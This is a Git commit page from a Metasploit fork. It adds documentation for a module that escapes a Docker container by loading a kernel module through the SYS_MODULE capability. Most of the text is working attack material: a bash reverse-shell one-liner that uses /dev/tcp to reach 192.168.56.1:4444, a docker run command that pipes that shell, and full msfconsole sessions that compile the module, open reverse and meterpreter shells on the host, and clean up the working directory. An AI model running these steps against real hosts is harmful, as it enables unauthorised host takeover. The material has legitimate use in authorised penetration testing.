adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Added documentation for kernel escape

Browse Source
This commit is contained in:
RadioLogic
2023-11-07 21:50:09 -05:00
parent 2d683954de
commit cf0477138d
1 changed files with 106 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
documentation/modules/exploit/linux/local/docker_privileged_container_kernel_escape.md
+106
View File
@@ -0,0 +1,106 @@
## Vulnerable Application
This module performs a container escape onto the host as the daemon user. It
takes advantage of the SYS_MODULE capability. If that exists and the linux
headers are available to compile on the target, then we can escape onto the host.
### Creating A Testing Environment
- Get a VM that you want to test on (or your own machine)
- Install Docker
- Run a listener (can be anything but well use an example of a bash reverse shell)
```msf
msf6 > use payload/cmd/unix/reverse_bash
msf6 payload(cmd/unix/reverse_bash) > set lhost vboxnet0
lhost => 192.168.56.1
msf6 payload(cmd/unix/reverse_bash) > generate -f raw
bash -c '0<&118-;exec 118<>/dev/tcp/192.168.56.1/4444;sh <&118 >&118 2>&118'
msf6 payload(cmd/unix/reverse_bash) > exploit -z
[*] Payload Handler Started as Job 0
msf6 payload(cmd/unix/reverse_bash) >
[*] [2023.11.07-21:28:57] Started reverse TCP handler on 192.168.56.1:4444
```
- Create a privileged container (forwarding port 4444 in this example in order to use a bind shell from the host. Container must be the same OS as host)
```bash
docker run --rm -it -p 4444:4444 --cap-add SYS_MODULE ubuntu bash -c '0<&118-;exec 118<>/dev/tcp/192.168.56.1/4444;sh <&118 >&118 2>&118'
```
- Inside your session, install the required packages to run. Package manager will differ to OS, for debian as an example
```bash
apt update && apt install -y gcc make kmod linux-headers-$(uname -r)
```
## Verification Steps
1. start msfconsole
2. get a session
1. `use exploit/linux/local/docker_privileged_container_kernel_escape`
2. `set SESSION [session]`
3. `set PAYLOAD [payload]`
6. `exploit`
## Options
### KernelModuleName
The name that the kernel module will be called in the system. The default if no name is set is "{rand(8)}"
### WritableContainerDir
A directory where we can write files inside the container (default is /tmp/.{rand(4)}). This is needed to drop the payload into the container.
### ReloadKernelModule
Rebuilds and reloads kernel module if its already loaded in case of repeat runs.
## Scenarios
### Container Escape from debian linux with reverse bash
```msf
msf6 > sessions -i 1 -c "apt update && apt install -y gcc make kmod linux-headers-$(uname -r)"
[*] Running 'apt update && apt install -y gcc make kmod linux-headers-$(uname -r)' on shell session 1 (192.168.56.126)
msf6 > use exploit/linux/local/docker_privileged_container_kernel_escape
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > set session 1
session => 1
msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > check
[*] The target appears to be vulnerable. Inside Docker container and target appears vulnerable
msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > exploit -z
[*] [2023.11.07-21:42:40] Started reverse TCP handler on 192.168.56.1:4444
[*] [2023.11.07-21:42:42] Creating files
[*] [2023.11.07-21:42:43] Making kernel module
[+] [2023.11.07-21:42:43] Kernel module compiled successfully
[*] [2023.11.07-21:42:43] Loading kernel module
[*] Command shell session 3 opened (192.168.56.1:4444 -> 192.168.56.126:60974) at 2023-11-07 21:42:50 -0500
[*] This is CredCollect, I have the conn!
```
### Container Escape from arch linux with meterpreter
```msf
msf6 > sessions -i 2 -c "pacman -Syy --noconfirm gcc glibc make linux-headers"
[*] Running 'pacman -Syy --noconfirm gcc glibc make linux-headers' on shell session 2 (192.168.56.106)
msf6 > use exploit/linux/local/docker_privileged_container_kernel_escape
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > set session 2
session => 2
msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > set lhost vboxnet0
lhost => vboxnet0
msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > check
[*] The target appears to be vulnerable. Inside Docker container and target appears vulnerable
msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > exploit -z
[*] [2023.11.07-21:48:40] Started reverse TCP handler on 192.168.56.1:4444
[*] [2023.11.07-21:48:41] Creating files
[*] [2023.11.07-21:48:43] Making kernel module
[+] [2023.11.07-21:48:44] Kernel module compiled successfully
[*] [2023.11.07-21:48:44] Loading kernel module
[*] [2023.11.07-21:48:44] Sending stage (3045380 bytes) to 192.168.56.106
[*] Meterpreter session 4 opened (192.168.56.1:4444 -> 192.168.56.106:50402) at 2023-11-07 21:48:45 -0500
[*] This is CredCollect, I have the conn!
[!] [2023.11.07-21:48:45] Attempting to delete working directory /tmp/.IvLx
[*] Session 4 created in the background.
```